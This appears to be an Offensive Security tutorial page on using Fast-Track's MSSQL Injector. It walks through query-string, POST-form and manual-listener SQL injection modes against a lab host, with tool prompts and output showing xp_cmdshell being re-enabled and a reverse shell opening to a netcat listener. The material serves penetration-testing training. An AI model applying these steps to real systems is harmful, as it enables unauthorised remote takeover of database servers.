Notification:  

Add   Edit   Delete   Sort   Print   Change Password   Settings   Permissions

The MSSQL Injector utilizes some advanced techniques in order to ultimately gain full unrestricted access to the underlying system. This section requires someone to already know where SQL Injection is on a given site. Once this is specified, Fast-Track can do the work for you and exploit the system. Note that this will only work on Microsoft SQL back-end to a web application.

 Fast-Track Main Menu:

    Fast-Track - Where it's OK to finish in under 3 minutes...
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Microsoft SQL Tools
    4.  Mass Client-Side Attack
    5.  Exploits
    6.  Binary to Hex Payload Converter
    7.  Payload Generator
    8.  Fast-Track Tutorials
    9.  Fast-Track Changelog
    10. Fast-Track Credits
    11. Exit

    Enter the number: 3

Microsoft SQL Attack Tools

Pick a list of the tools from below:

1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage

Enter your choice : 1

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice:

Notice the different sub-menus that are available. We'll walk through each one and explain its purpose. The 'SQL Injector - Query String Parameter Attack' specifically targets vulnerable
query string parameters within a website. Query strings are represented as follows: ?querystring1=value1&querystring2=value2 and injection often occurs where value1 and value2 are located. Let's browse to a vulnerable site:

Note the query string parameters on top: logon and password. Let's throw a single quote in the
'login' query string parameter.

Now that we know that the login field is susceptible to SQL Injection, we need to tell Fast-Track where to actually go to launch the attack. We do this by specifying 'INJECTHERE in place of the injectable parameter in the query string. This will let Fast-Track know what we want to attack. Look at the below output and the ultimate result.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 1


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Requirements: PExpect
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This module uses a reverse shell by using the binary2hex method for uploading.
It does not require FTP or any other service, instead we are using the debug
function in Windows to generate the executable.

You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah



Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter here: http://10.211.55.128/Default.aspx?login='INJECTHERE&password=blah
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Fast-Track automatically re-enables the 'xp_cmdshell' stored procedure if it is disabled and delivers a reverse payload to the system, ultimately giving us full access all through SQL Injection!

This was a great example of how to attack query string parameters, but what about forms? Post parameters can also be handled through Fast-Track and very easily at that. In the Fast-Track 'MSSQL Injector' menu, select 'SQL Injector - POST Parameter Attack'.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 2

This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.

Example: http://www.sqlinjectablesite.com/index.aspx

Enter the URL to attack: http://10.211.55.128/Default.aspx

Forms detected...attacking the parameters in hopes of exploiting SQL Injection..

Sending payload to parameter: txtLogin

Sending payload to parameter: txtPassword

[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]

listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Not to quote Office Max, but that was easy! Fast-Track automatically detects the forms and attacks the system for SQL Injection, ultimately giving you access to the box.

If for some reason the query string parameter attack was unsuccessful, you can use the 'SQL Injector - GET FTP Payload Attack'. This requires that you install ProFTPD, and is rarely used. This module will setup a payload through FTP echo files and ultimately deliver the payload through FTP and SQL Injection.

The 'SQL Injector - GET Manual Setup Binary Payload Attack' can be used if you're attacking from one machine but have a listener on another machine. This is often used if you're NATed and you have a listener box set up on the internet and not on the system you're attacking from.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 4

The manual portion allows you to customize your attack for whatever reason.

You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah



Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter here: http://10.211.55.128/Default.aspx?login='INJECTHERE&password=blah
Enter the IP Address of server with NetCat Listening: 10.211.55.130
Enter Port number with NetCat listening: 9090


Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload....
Sending second portion of payload....
Sending next portion of payload...
Sending the last portion of the payload...
Running cleanup...
Running the payload on the server...
listening on [any] 9090 ...
10.211.55.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1045
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>






© Offensive Security 2009